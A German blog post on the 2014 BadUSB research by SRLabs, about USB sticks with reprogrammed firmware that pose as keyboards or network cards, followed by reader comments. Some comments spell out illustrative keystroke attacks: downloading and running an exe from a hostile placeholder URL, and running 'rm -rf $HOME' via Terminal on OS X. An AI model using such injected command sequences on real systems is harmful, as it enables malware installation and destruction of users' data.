BadUSB: USB-Sticks sind mal wieder gefährlich
Auf der Blackhat Konferenz könnten die zwei Deutschen Karsten Nohl und Jakob Lell von SRLabs.de es richtig krachen lassen. Sie wollen demonstrieren, dass die USB-Schnittstelle ein gefährliches Einfallstor ist, sodass jeder speziell präparierte USB-Stick ohne das Zutun eines Anwenders Schaden anrichten kann.
In ihrem Beitrag berichten die Beiden von der Gefährlichkeit der Sticks, da diese sich durch eine entsprechende Modifizierung der Firmware eben nicht nur als USB-Stick ausgeben können, sondern auch als Maus, Scanner oder ähnliches. So könnte ein entsprechend präparierter Stick als Tastatur dienen und Befehle ausführen – zum Beispiel eine Malware installieren.
Viele USB-Sticks haben Controller verbaut, die sich nach Angaben der Sicherheitsforscher einfach umprogrammieren lassen. Nicht nur das Emulieren einer Tastatur soll möglich sein, sondern man könnte eine Netzwerkkarte nachstellen und die DNS-Einstellungen eines Rechners ändern, um sämtlichen Internetverkehr umzuleiten.
Alternativ lässt sich natürlich jegliche Form von Software – zum Beispiel Viren – direkt installieren. Malwarescanner sollen angeblich machtlos sein, da diese nicht auf die Firmware der Sticks zugreifen können. Eine Demonstration des Ganzen will man auf der BlackHat 2014 am 7. August zeigen. Mal schauen, welche Informationen dabei herauskommen.
Nachrichten dieser Art gibt es ja schon länger, doch mal wieder gut, dass die Thematik wieder groß breitgetreten wird. Es ist nicht mehr nur gefährlich, andere Smartphones oder Sticks zu nutzen, sondern auch die, die man vielleicht zu Werbezwecken geschenkt bekommt.
Tolles Foto!
Die wichtigste Info fehlt leider, nämlich welche Systeme das betrifft.
Spannend.
Ich versuche mir gerade ein sinniges Szenario auszudenken, in dem ein so manipulierter Stick wirklich irgendetwas bewirken kann, aber es fällt mir keins ein. Bitte erleuchte mich jemand!
Wenn der Stick die DNS Einstellungen ändern sollte, dann muss ja ein OS hochgefahren sein, dann wiederum aber greift das Malewareprogrämmchen aber (theoretisch) ein, so das ein bekannter Virus/Trojaner/bla gehindert wird, etwas zu tun.
Aber dennoch ein interessantes Konzept finde ich, einem USB-Stick eine virtuelle Tastatur mitzugeben, die dann -wo auch immer- irgendetwas rumtippt.
Nochmal an die Profis hier: Welche Szenarios wären denn denkbar?
Schaffen wir einfach die ganze Technologie ab und leben wie im Mittelalter.
Dann gibts solche Probleme nicht mehr, dafür genug andere.
@Gast: Es sind alle Betriebssysteme, die etwas mit USB-Geräten anfangen können, betroffen.
@Namenlos: Das Malwareprogramm kann nichts dagegen unternehmen. Es sieht nur, dass du zwei USB-Geräte angeschlossen hast. Einen USB-Stick und eine Tastatur. Und die Tastatur gibt die Befehle um eine Malware zu installieren. Woher soll es wissen, dass es nicht einfach Maus und Tastatur an einem USB-Hub sind?
@Gast: Jedes System (Windows, Mac OS X, Linux) installiert eine Tastatur ohne Beanstandung und ohne nachzufragen. Betrifft also jedes System.
@Namenlos: „Windows-Taste“ + „R“ -> iexplore http://www.eine-boese-adresse.to/virus.exe -> 2x die Pfeiltaste nach unten -> Enter (exe wird ausgeführt) -> Enter (Admin rechte wird gegeben) -> Malware installiert.
Die AV-Software (falls bekannt) könnte man darüber ausschalten. Bei einem gezielten(!) Angriff auf eine Business Infrastruktur eine einfache sache da man sollches alles im vorhinaus in erfahrung bringt.
Als ob das was neues wär – hängste in nen präparierten stick zu erst nen usb-hub-controller kannste gleich x andere controller parallel ranschalten – also Netzwerk, Maus, Tastatur und co alles in einem…
@Konstantin: Klar ist es schon länger bekannt. Jedoch hat bis jetzt noch kein OS Hersteller Reagiert.
Ist würde mir das so vorstellen:
Ich schliesse eine neue Tastatur an und Windows Fragt mich: „Möchten Sie die Tastatur (Logitech xyz) installieren? Falls Sie nichts tun wird diese in 60 Sekunden automatisch installier“.
Malwarescanner können zwar nicht auf die Firmware des Sticks zugreifen, schreiten aber ein wenn Malware auf’s System gelangt. Auf OS X schützt zusätzlich Gatekeeper (nur Apps auf dem App Store laufen) und die Benutzer und Gruppensteuerung.
Im Prinzip ist jede unbekannte angestöpselte Hardware gefährich.
Schon letztes Jahr hatten Sicherheitsforscher zum Beispiel gezeigt, wie sich über ein Netzteil Schadsoftware aufs iPhone schleusen ließ.
Gibt es doch schon seit mindestens 4 Jahren. Kann man sogar bestellen: Google nach „USB Rubber Ducky“. Das wird als Tastatur erkannt (Win, Mac, Linux) und kann beliebige Befehle ausführen, wenn es in einem PC gesteckt wird.
Ich kann mir auch nicht vorstellen, dass unter OS X irgend ein Code durch so einen Stick ausgeführt werden kann. Leider ist auf dem Foto ausgerechnet ein MacBook zu sehen.
Denkbar wäre ein Gerätchen dass wie ein Geldschein-Tester prüft, als was sich ein Stick ausgibt.
@Andreas, warum sollte das unter OSX nicht funktionieren?
Wenn das Ding eine Tastatur emuliert, dann: apple+space->terminal->apple script um das terminal zu fokussieren->rm -rf $HOME
Die Technik ist simpel, nen 100% Schutz ist annähernd unmöglich, wenn müßte das OS 100% saubere Firmware für jedes Gerät mitbringen und der Kernel eben diese auf dem Gerät direkt beim anstecken überschreiben.
Gerade Apple-Nutzer fühlen sich gerne immun gegen die Gefahr. Dabei wird man auf einem iMac/MacBook eine Infektion kaum bemerken, wenn sie einigermassen gut gemacht ist. Keine Plattenlämpchen, kein WLAN-Lämpchen und Gedenksekunden zwischendurch sind nichts aussergewöhnliches. „Es funktioniert einfach“. Bei Windows dagegen wird man mehrfach darauf hingewiesen, wenn man keine Vorsichtsmaßnahmen ergriffen hat.
@Markus Ritzmann: Unter Linux wirst Du aber auch mit einer „Tastatur“ keinen übermäßig großen Schaden anrichten können, sondern maximal Dein Homeverzeichnis plätten. Denn über eine Tastatur kannst Du ohne Paßwort-Eingabe keine systemweite Software/Malware installieren. Es sein denn, Du wärest als root unterwegs, bzw. hättest anderweitig (sudo) die Sicherheitsmechanismen ausgehebelt.
@Gast
Oder du startest mit lokalen Rechten eine remote shell über die so ungefährliche „Tastatur“, kannst dir ganz in ruhe das System anschauen, dir einen root-exploit raussuchen und voila…
@Andreas: https://www.youtube.com/watch?v=pLsOs8LwU0U
Was hier mal wieder diskutiert wird.
1. Diese Gefahren kennt jedes IT-Unternehmen, daher ist diese Demonstration bzw. der Artikel hier einfach nur eine Auffrischung um uns mal wieder aufzuwecken.
2. Plug&Play ist durchaus gefährlich z.B. für Botnetze.
3. Die größte Gefahr bilden aber die APTs und da hilft kein Antivirus, oder was auch immer Programm, da die Signatur zugeschnitten ist und keiner damit was anfangen kann.
@Thomas
Ich denke auch am alleraller-gefährlichsten sind Damen wie auf dem Artikel-Foto.